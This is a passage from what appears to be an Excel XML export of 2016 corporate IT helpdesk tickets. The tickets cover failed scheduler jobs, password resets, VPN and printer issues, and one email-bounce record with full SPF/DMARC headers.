    <s v="from: gdhyrts muggftyali  _x000a_sent: monday, september 26, 2016 8:06 am_x000a_to: chefghtyn chnbghyg; nwfodmhc exurcwkm_x000a_subject: rad: regarding cell phone model.._x000a__x000a_hello chefghtyn,_x000a_gso will help on this, i am copying to them._x000a__x000a_hello gso,_x000a_please help on this. _x000a__x000a_"/>
    <s v="kbclinop vsczklfp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ç”µè„‘ç³»ç»Ÿå¯åŠ¨è“å±ã€‚"/>
    <s v="ç”µè„‘ç³»ç»Ÿå¯åŠ¨è“å±ã€‚æ°´ä¸å°å¿ƒæ´’åˆ°ç”µè„‘é‡Œé¢ã€‚"/>
    <s v="hdungfsc znuhyjkx"/>
    <x v="31"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u2 failed in job_scheduler at: 09/25/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u2 failed in job_scheduler at: 09/25/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u1 failed in job_scheduler at: 09/25/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u1 failed in job_scheduler at: 09/25/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u6 failed in job_scheduler at: 09/25/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u6 failed in job_scheduler at: 09/25/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="need to know who the processor is."/>
    <s v="from: kbyivdfz zwutmehy [mailto:kbyivdfz.zwutmehy@gmail.com] _x000d__x000a_sent: monday, september 26, 2016 5:53 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: rad:need to know who the processor is._x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_need to know who the processor might be._x000d__x000a__x000d__x000a_kindly check and let me know who have authority to approve of a0 and a4 _x000d__x000a__x000d__x000a_internal purchase requisition can not be released, so i cannot issue po._x000d__x000a__x000d__x000a_best "/>
    <s v="kbyivdfz zwutmehy"/>
    <x v="29"/>
  </r>
  <r>
    <s v="reset pw "/>
    <s v="_x000a__x000a_received from: yhmzxcia.heszapvl@gmail.com_x000a__x000a_please help to reset pass word for erp SID_34_x000a_user id : hertel_x000a__x000a__x000a_best "/>
    <s v="yhmzxcia heszapvl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wireless outage again-taiwan 0926"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ticqvhal.vgokzesi@gmail.com_x000d__x000a__x000d__x000a_hello~_x000d__x000a__x000d__x000a_wireless(companysecure) outage of taiwan._x000d__x000a_please help~_x000d__x000a__x000d__x000a_"/>
    <s v="ticqvhal vgokzesi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="job Job_3186 failed in job_scheduler at: 09/25/2016 20:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3186 failed in job_scheduler at: 09/25/2016 20:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job Job_2114 failed in job_scheduler at: 09/25/2016 17:32:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2114 failed in job_scheduler at: 09/25/2016 17:32:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="erp account lock"/>
    <s v="erp account lock"/>
    <s v="lfcwmxap ehodblur"/>
    <x v="0"/>
  </r>
  <r>
    <s v="it help"/>
    <s v="_x000a__x000a_received from: notwkdgr.zvmesjpt@gmail.com_x000a__x000a_do you have any idea why i received this message?_x000a__x000a_katfrthy cighyillo_x000a_consultant_x000a__x000a_notwkdgr.zvmesjpt@gmail.com&lt;mailto:notwkdgr.zvmesjpt@gmail.com&gt;_x000a_from: microsoft outlook_x000a_sent: sunday, september 25, 2016 4:09 pm_x000a_to: notwkdgr zvmesjpt_x000a_subject: undeliverable: fw: company ec mfg_tooltion in us_x000a__x000a_[image removed by sender.]_x000a__x000a_your message to dhermosi@gmail.com couldn't be delivered._x000a__x000a_gmail.com couldn't confirm that your message was sent from a trusted location._x000a__x000a_kathleen.cirillo_x000a__x000a_office 365_x000a__x000a_dhermosi_x000a__x000a_action required_x000a__x000a_recipient_x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_spf validation error_x000a__x000a__x000a__x000a_how to fix it_x000a__x000a_your organization's email admin will have to diagnose and fix your domain's email settings. please forward this message to your email admin._x000a__x000a__x000a__x000a__________________________________x000a__x000a__x000a_more info for email admins_x000a__x000a_status code: 550 5.7.23_x000a__x000a_this error occurs when sender policy framdntyework (spf) validation for the sender's domain fails. if you're the sender's email admin, make sure the spf records for your domain at your domain registrar are set up correctly. office 365 supports only one spf record (a txt record that defines spf) for your domain. include the following domain name: spf.protection.outlook.com. if you have a hybrid configuration (some mailboxes in the cloud, and some mailboxes on premises) or if you're an exchange online protection standalone customer, add the outbound ip address of your on-premises servers to the txt record._x000a__x000a_for more information and instructions about configuring spf records see customize an spf record to validate outbound mail sent from your domain&lt;#bkmk_spfrecords&gt;._x000a__x000a_original message details_x000a__x000a_created date:_x000a__x000a_9/25/2016 8:08:51 pm_x000a__x000a_sender address:_x000a__x000a_notwkdgr.zvmesjpt@gmail.com_x000a__x000a_recipient address:_x000a__x000a_dhermosi@gmail.com_x000a__x000a_subject:_x000a__x000a_fw: company ec mfg_tooltion in us_x000a__x000a__x000a__x000a_error details_x000a__x000a_reported error:_x000a__x000a_550 5.7.23 the message was rejected because of sender policy framdntyework violation -&gt; 550 5.7.1 unauthenticated email from hr_tool.com is not accepted due to domain's;dmarc policy. please contact the administrator of hr_tool.com domain if;this was a legitimate mail. please visit; _x000a__x000a_dsn generated by:_x000a__x000a_dm5pr05mb2985.namprd05.prod.outlook.com_x000a__x000a_remote server:_x000a__x000a_mx.google.com_x000a__x000a__x000a__x000a_message hops_x000a__x000a_hop_x000a__x000a_time (utc)_x000a__x000a_from_x000a__x000a_to_x000a__x000a_with_x000a__x000a_relay time_x000a__x000a_1_x000a__x000a_9/25/2016_x000a_8:08:52 pm_x000a__x000a_dm5pr05mb2986.namprd05.prod.outlook.com_x000a__x000a_dm5pr05mb2986.namprd05.prod.outlook.com_x000a__x000a_mapi_x000a__x000a_1 sec_x000a__x000a_2_x000a__x000a_9/25/2016_x000a_8:08:52 pm_x000a__x000a_dm5pr05mb2986.namprd05.prod.outlook.com_x000a__x000a_dm5pr05mb2985.namprd05.prod.outlook.com_x000a__x000a_microsoft smtp server (version=tls1_2, cipher=tls_ecdhe_rsa_with_aes_256_cbc_sha384_p384)_x000a__x000a_*_x000a__x000a__x000a_original message headers_x000a__x000a_dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=company.com;_x000a__x000a_ s=selector1; h=from:date:subject:message-id:content-type:mime-version;_x000a__x000a_ bh=p2khj+cx28ii4sgrkpfsbsxqqzvxrpkmbumy6bgcvme=;_x000a__x000a_ b=sv2v6uxr4jlaemyl32oakf6q2tpv80vdn3wyalrvmwpvlt0ih4leelrpzts6atf863lwqaiwmpjkyor/nks/b+3ricx0tqctyws3prvdutl1to1ghty3be75w2bfc12uvw0mapgzzbtnqsozevisyen3o2tqkq1mumxccbhz85m=_x000a__x000a_received: from dm5pr05mb2986.namprd05.prod.outlook.com (10.168.176.150) by_x000a__x000a_ dm5pr05mb2985.namprd05.prod.outlook.com (10.168.176.149) with microsoft smtp_x000a__x000a_ server (version=tls1_2, cipher=tls_ecdhe_rsa_with_aes_256_cbc_sha384_p384) id_x000a__x000a_ 15.1.649.6; sun, 25 sep 2016 20:08:52 +0000_x000a__x000a_received: from dm5pr05mb2986.namprd05.prod.outlook.com ([10.168.176.150]) by_x000a__x000a_ dm5pr05mb2986.namprd05.prod.outlook.com ([10.168.176.150]) with mapi id_x000a__x000a_ 15.01.0649.011; sun, 25 sep 2016 20:08:52 +0000_x000a__x000a_from: &quot;favot, jean-jacques&quot; &lt;jean-jacques.favot@hr_tool.com&gt;_x000a__x000a_to: &quot;dhermosi@gmail.com&quot; &lt;dhermosi@gmail.com&gt;_x000a__x000a_subject: fw: company ec mfg_tooltion in us_x000a__x000a_thread-topic: company ec mfg_tooltion in us_x000a__x000a_thread-index: adiu0k1lhl+ozbuesgkwoqwhf5sr3waakvcg_x000a__x000a_sender: notwkdgr zvmesjpt &lt;notwkdgr.zvmesjpt@gmail.com&gt;_x000a__x000a_date: sun, 25 sep 2016 20:08:51 +0000_x000a__x000a_message-id: &lt;dm5pr05mb29862fd8edab0c9b7115e87aefca0@dm5pr05mb2986.namprd05.prod.outlook.com&gt;_x000a__x000a_references: &lt;dm5pr05mb2986c91ed54f6510f97f2eb3efc90@dm5pr05mb2986.namprd05.prod.outlook.com&gt;_x000a__x000a_in-reply-to: &lt;dm5pr05mb2986c91ed54f6510f97f2eb3efc90@dm5pr05mb2986.namprd05.prod.outlook.com&gt;_x000a__x000a_accept-language: en-us_x000a__x000a_content-language: en-us_x000a__x000a_x-ms-has-attach: yes_x000a__x000a_x-ms-tnef-correlator:_x000a__x000a_authentication-results: spf=none (sender ip is )_x000a__x000a_ smtp.mailfrom=notwkdgr.zvmesjpt@gmail.com;_x000a__x000a_x-ms-exchange-messagesentrepresentingtype: 2_x000a__x000a_x-ms-exchange-meetingforward-message: forward_x000a__x000a_x-originating-ip: [24.74.132.83]_x000a__x000a_x-ms-office365-filtering-correlation-id: 32e76e86-fb83-4c95-b8c1-08d3e57fc557_x000a__x000a_x-microsoft-exchange-diagnostics:_x000a__x000a_        1;dm5pr05mb2985;6:6zwkfzfqhveyrfplvnz0nkjsmck9qwehil1qgumjnxnqprprqkdhi+rvjj3uc2nejqa0fzgtz4jij+acwuv88puzdunk0hjwjqwvmyqk4t6qt0f+so8tovjk6vrsw4nbmikos5ta5pagfw3tlikizopxoin40z46el9nwzgqwxh2dfht+kz7mql5a3+pajmwsrgslv94qwosb/+oqmwgxvfmlsw+z406vgi7xwkSID_61qzzitpqy4lu86dri3ottgk1xzayeeyzavg6eudngmojgvhdtnqwuio1j8ybnp/xet+hr9grz1ft1y57dsb/hkcy3iuez7slc3yb86gt2/5nrs2wzh90jzgmtanpptqedo=;5:5vw9vc14yq2yep5u2pocqfthezol3pfhxzkwojpdnpwkzpomtdksxjgwu6zrcjk/gbfmvjr3q8g1gvlyai7kcekgjrnwpozuhpv6erkfxyf08+b2xt3nfjd7vsr0kxcifcv61ddkrkgwwnfnaklxdg==;24:cheincs2ucpegyhr2jxtdz4i0u4emaklov/7pefvrpt+qnxldyya8iuersial1s+rrranhcq2jepzug8qvggjsdvnk4ibmjw05qnt0jhj0s=;7:8x23g2habfqwviwctkdxqupnpbikhjtjiylmevfzllvnwoggkaenkvbsoltry7j36exff+7prcp9ejfgu+hih0ognmjetr0okkpaemfapugfinxzgn03bwwvkifmzcsfrcsre3wvfocm4gqhn2l/vh+uow9qrijelr+yuhm5lbonhp/mlumfit4atgzwedr8/orp9a7e4nclbrvinpcrdn3f3pzm+xfd7qqr3s1poembzawfucemmdkg8tt6f5znyd3bdftagjq+czljtqjboyohmsd9kaw/yj9guwxlcemjtijzkysxvmp7dwujtas+_x000a__x000a_x-microsoft-antispam: uriscan:;bcl:0;pcl:0;ruleid:;srvr:dm5pr05mb2985;_x000a__x000a_x-microsoft-antispam-prvs: &lt;dm5pr05mb2985cd25ac255f59cd58b973efca0@dm5pr05mb2985.namprd05.prod.outlook.com&gt;_x000a__x000a_x-exchange-antispam-report-uacyltoe hxgaycze: uriscan:(141303121974841)(21748063052155);_x000a__x000a_x-exchange-antispam-report-cfa-uacyltoe hxgaycze: bcl:0;pcl:0;ruleid:(213526432)(7151287)(601004)(3512158)(6116117)(9232612157)(4113112)(10201501046)(7166137);srvr:dm5pr05mb2985;bcl:0;pcl:0;ruleid:;srvr:dm5pr05mb2985;_x000a__x000a_x-forefront-prvs: 0076f48c8a_x000a__x000a_x-forefront-antispam-report: sfv:nspm;sfs:(21120131)(7110112)(8027113)(488565114)(189002)(199003)(3584113)(3011211112)(7027110)(3061211113)(53993117)(88107116)(5002640100001)(15975445007)(2522112)(87687112)(0797113)(233667113)(212527112)(08847115)(218997113)(3017113)(6751811112)(44767113)(561211112)(79847118)(213947114)(9047113)(290009112)(19580405001)(85427113)(77177112)(586003)(4957113)(11100500001)(92277117)(92267125)(6901211112)(8847113)(2841811114)(00397113)(221247114)(416056116)(03677113)(10400500002)(3612114)(217467112)(98047112)(216697113)(87287000)(3462112)(00047112)(65467000)(9787113)(6771411112)(4771811112)(4391811113)(19580395003)(7227113)(61097000)(8707115);dir:out;sfp:1102;scl:1;srvr:dm5pr05mb2985;h:dm5pr05mb2986.namprd05.prod.outlook.com;fpr:;spf:none;ptr:infonorecords;mx:1;a:1;lang:;_x000a__x000a_received-spf: none (protection.outlook.com: company.com does not designate_x000a__x000a_ permitted sender hosts)_x000a__x000a_spamdiagnosticoutput: 1:99_x000a__x000a_spamdiagnosticmetadata: nspm_x000a__x000a_content-type: multipart/mixed;_x000a__x000a_        boundary=&quot;_006_dm5pr05mb29862fd8edab0c9b7115e87aefca0dm5pr05mb2986namp_&quot;_x000a__x000a_mime-version: 1.0_x000a__x000a_x-originatororg: company.com_x000a__x000a_x-ms-exchange-crosstenant-originalarrivaltime: 25 sep 2016 20:08:51.7604_x000a__x000a_ (utc)_x000a__x000a_x-ms-exchange-crosstenant-fromentityheader: hosted_x000a__x000a_x-ms-exchange-crosstenant-id: e7ee4711-c0b1-4311-b500-b80d89e5b298_x000a__x000a_x-ms-exchange-transport-crosstenantheadersstamped: dm5pr05mb2985_x000a__x000a__x000a_"/>
    <s v="notwkdgr zvmesjpt"/>
    <x v="26"/>
  </r>
  <r>
    <s v=" eagsm657 : the service (security_tool password manager) is stopped or disabled or is not installed on the target machine"/>
    <s v=" eagsm657 : the service (security_tool password manager) is stopped or disabled or is not installed on the target machine"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="19"/>
  </r>
  <r>
    <s v="account locked , unable to login to ess portal"/>
    <s v="account locked , unable to login to ess portal"/>
    <s v="mrduhsci xmvkzqja"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1429 failed in job_scheduler at: 09/25/2016 11:44:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1429 failed in job_scheduler at: 09/25/2016 11:44:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="lv23 not printing"/>
    <s v="lv23 not printing"/>
    <s v="mrduhsci xmvkzqja"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1420 failed in job_scheduler at: 09/25/2016 10:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1420 failed in job_scheduler at: 09/25/2016 10:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="ms crm configuration in outlook"/>
    <s v="ms crm configuration in outlook"/>
    <s v="bjeacoiy ufaqhlog"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sound coming from computer while connecting any device or moving monitor."/>
    <s v="sound coming from computer while connecting any device or moving monitor."/>
    <s v="kexcsbgw lzabjxwf"/>
    <x v="18"/>
  </r>
  <r>
    <s v="job snp_heu_6_regen failed in job_scheduler at: 09/25/2016 08:57:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_6_regen failed in job_scheduler at: 09/25/2016 08:57:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="sound issue : 7350"/>
    <s v="summary:issue with the sound of the laptop .there's no sound ."/>
    <s v="kexcsbgw lzabjxwf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1343 failed in job_scheduler at: 09/25/2016 07:49:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1343 failed in job_scheduler at: 09/25/2016 07:49:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="markhtyingre email as junk"/>
    <s v="hello all_x000d__x000a_how are you doing?_x000d__x000a__x000d__x000a_please can you put this email in general junk?_x000d__x000a__x000d__x000a_it's a spam ...._x000d__x000a_thx_x000d__x000a_gergryth_x000d__x000a__x000d__x000a_"/>
    <s v="hupnceij hyozjakb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job co_val_update_crosscomp failed in job_scheduler at: 09/25/2016 05:55:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job co_val_update_crosscomp failed in job_scheduler at: 09/25/2016 05:55:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job Job_1148 failed in job_scheduler at: 09/25/2016 01:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1148 failed in job_scheduler at: 09/25/2016 01:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_3049 failed in job_scheduler at: 09/25/2016 01:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3049 failed in job_scheduler at: 09/25/2016 01:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3049 failed in job_scheduler at: 09/25/2016 00:46:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3049 failed in job_scheduler at: 09/25/2016 00:46:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="44"/>
  </r>
  <r>
    <s v="job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 09/25/2016 00:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 09/25/2016 00:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1141 failed in job_scheduler at: 09/24/2016 23:45:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1141 failed in job_scheduler at: 09/24/2016 23:45:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v=" application &quot;plm scheduled tasks monitor&quot;  in a critical state for the below mentioned serevrs."/>
    <s v="alwaysupservice.exe for plm conversion server -  on HostName_108 _x000a_plm conversion server on HostName_107_x000a_plm conversion server on HostName_520_x000a_plm conversion server on HostName_521_x000a_"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="7"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password for dcaokyph.vrdnocxs@gmail.com"/>
    <s v="from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] _x000a_sent: sunday, september 25, 2016 2:04 am_x000a_to: nwfodmhc exurcwkm_x000a_cc: tiyhum kuyiomar_x000a_subject: request to reset microsoft online services password for dcaokyph.vrdnocxs@gmail.com_x000a__x000a_    request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ dcaokyph.vrdnocxs@gmail.com _x000a_â€¢ first name: allert _x000a_â€¢ last name: herghan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dcaokyph vrdnocxs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inquiry on erp status- unable to access ess portal"/>
    <s v="inquiry on erp status- unable to access ess portal"/>
    <s v="aqdjcuhn lagfitkz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_444 failed in job_scheduler at: 09/24/2016 19:40:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_444 failed in job_scheduler at: 09/24/2016 19:40:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job bkbackup_tool_powder_prod_full failed in job_scheduler at: 09/24/2016 18:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_powder_prod_full failed in job_scheduler at: 09/24/2016 18:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_56hoti failed in job_scheduler at: 09/24/2016 18:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_56hoti failed in job_scheduler at: 09/24/2016 18:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_38hoti failed in job_scheduler at: 09/24/2016 17:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_38hoti failed in job_scheduler at: 09/24/2016 17:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="vip 2--workflow notifications in  universal worklist."/>
    <s v="vip 2 - ticket_x000a__x000a_received from: dxyvfuhr.uyfqgomx@gmail.com_x000a__x000a__x000a_all, having reviewed this with joothyst and clrgtydia, the problem is not caused by the exclusion list, or the cm workflow._x000a_the problem is because of a security configuration, where joftgost receives items in the universal worklist, but no e-mail notification._x000a_we traced this to screen su01d, where in the screenshot attached to this incident, you will see the e-mail address for joftgost is incorrectly &quot;joftgost.berfkting@company.com&quot;._x000a_please update this to &quot;dxyvfuhr.uyfqgomx@gmail.com&quot;._x000a__x000a__x000a__x000a_dear madam, sir, i am no longer receiving workflow notifications to my outlook inbox, how can i restore these?_x000a__x000a_with kind "/>
    <s v="dxyvfuhr uyfqgomx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job Job_3194 failed in job_scheduler at: 09/24/2016 14:10:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3194 failed in job_scheduler at: 09/24/2016 14:10:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="ms crmdynamics deployment query "/>
    <s v="ms crm dynamics deployment query. "/>
    <s v="tmopbken ibzougsd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="uacyltoe hxgaycze message email."/>
    <s v="from: efbwiadp dicafxhv _x000a_sent: saturday, september 24, 2016 10:19 pm_x000a_to: shesyhur posrt_x000a_subject: inc1554560 : uacyltoe hxgaycze message_x000a__x000a_hello shesyhur,_x000a__x000a_i have just checked, this issue was reported previously._x000a__x000a_after the upgrade users are getting email about uacyltoe hxgayczeing email configuration- please be aware that this is only part of the upgrade and can be safely deleted._x000a__x000a_"/>
    <s v="cfzsajbe lyejkdho"/>
    <x v="0"/>
  </r>
  <r>
    <s v="yahoo, emails skype team viewer not loading ; internet not working."/>
    <s v="yahoo, emails skype team viewer not loading ; internet not working ."/>
    <s v="deaokmqp oruitnmx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1429 failed in job_scheduler at: 09/24/2016 10:41:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1429 failed in job_scheduler at: 09/24/2016 10:41:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v=" uacyltoe hxgaycze email sent from neerthyu agrtywal id but neerthyu has not sent any such uacyltoe hxgaycze email . advise."/>
    <s v="from: neerthyu agrtywal _x000d__x000a_sent: saturday, september 24, 2016 5:49 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: fw: uacyltoe hxgaycze message_x000d__x000a_importance: low_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_i received this email which shows that it has been sent from my id where as i have not sent any such uacyltoe hxgaycze email. pl. look into this matheywter and advise._x000d__x000a__x000d__x000a_"/>
    <s v="okycwstu tvrnbgfs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sound issue : 7350 issue"/>
    <s v="sound issue : 7350 issue"/>
    <s v="crjhotyk pxslorbe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2040 failed in job_scheduler at: 09/24/2016 07:29:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2040 failed in job_scheduler at: 09/24/2016 07:29:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_1320 failed in job_scheduler at: 09/24/2016 06:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1320 failed in job_scheduler at: 09/24/2016 06:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="erp log on balancing error : vpn issue "/>
    <s v="erp log on balancing error : vpn issue "/>
    <s v="goaxzsql qpjnbgsa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the plant has had our n network drive deleted from all computers and we are unable to work."/>
    <s v=" is there anyway you can add our n network drives back to all computers or send instructions on how to add to each computer?"/>
    <s v="zqpyrxsn zihmunyb"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job Job_1388 failed in job_scheduler at: 09/24/2016 02:59:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1388 failed in job_scheduler at: 09/24/2016 02:59:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="pls help - unable to connect vpn"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vxhyftae.tbkyfdli@gmail.com_x000d__x000a__x000d__x000a_hello ,_x000d__x000a_please helo for subject matheywter . pls see below snapshot_x000d__x000a_[cid:image003.jpg@01SID_3565c.102ad310]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="vxhyftae tbkyfdli"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job apo_cif_pSID_74_ap failed in job_scheduler at: 09/24/2016 02:12:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job apo_cif_pSID_74_ap failed in job_scheduler at: 09/24/2016 02:12:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job apo_cif_pds3_am failed in job_scheduler at: 09/24/2016 02:12:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job apo_cif_pds3_am failed in job_scheduler at: 09/24/2016 02:12:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job apo_cif_pds1_am failed in job_scheduler at: 09/24/2016 02:12:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job apo_cif_pds1_am failed in job_scheduler at: 09/24/2016 02:12:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job apo_cif_pds3_eu failed in job_scheduler at: 09/24/2016 02:12:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job apo_cif_pds3_eu failed in job_scheduler at: 09/24/2016 02:12:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job bkwin_infonet1_full failed in job_scheduler at: 09/24/2016 01:40:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_infonet1_full failed in job_scheduler at: 09/24/2016 01:40:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1148 failed in job_scheduler at: 09/24/2016 01:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1148 failed in job_scheduler at: 09/24/2016 01:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="unable to access engineering_tool"/>
    <s v="unable to access engineering_tool due to vpn"/>
    <s v="uvjpaeli bnphqsxr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_56filesys failed in job_scheduler at: 09/23/2016 22:17:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_56filesys failed in job_scheduler at: 09/23/2016 22:17:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="not able to login to vpn,"/>
    <s v="not able to login to vpn,_x000d__x000a_-advised the caller to restart the system and check the internet connection._x000d__x000a_-advised the caller to logon to the company vpn._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="psikzmba stumdcqp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent help required- outlook to crm mfg_tooltion issue"/>
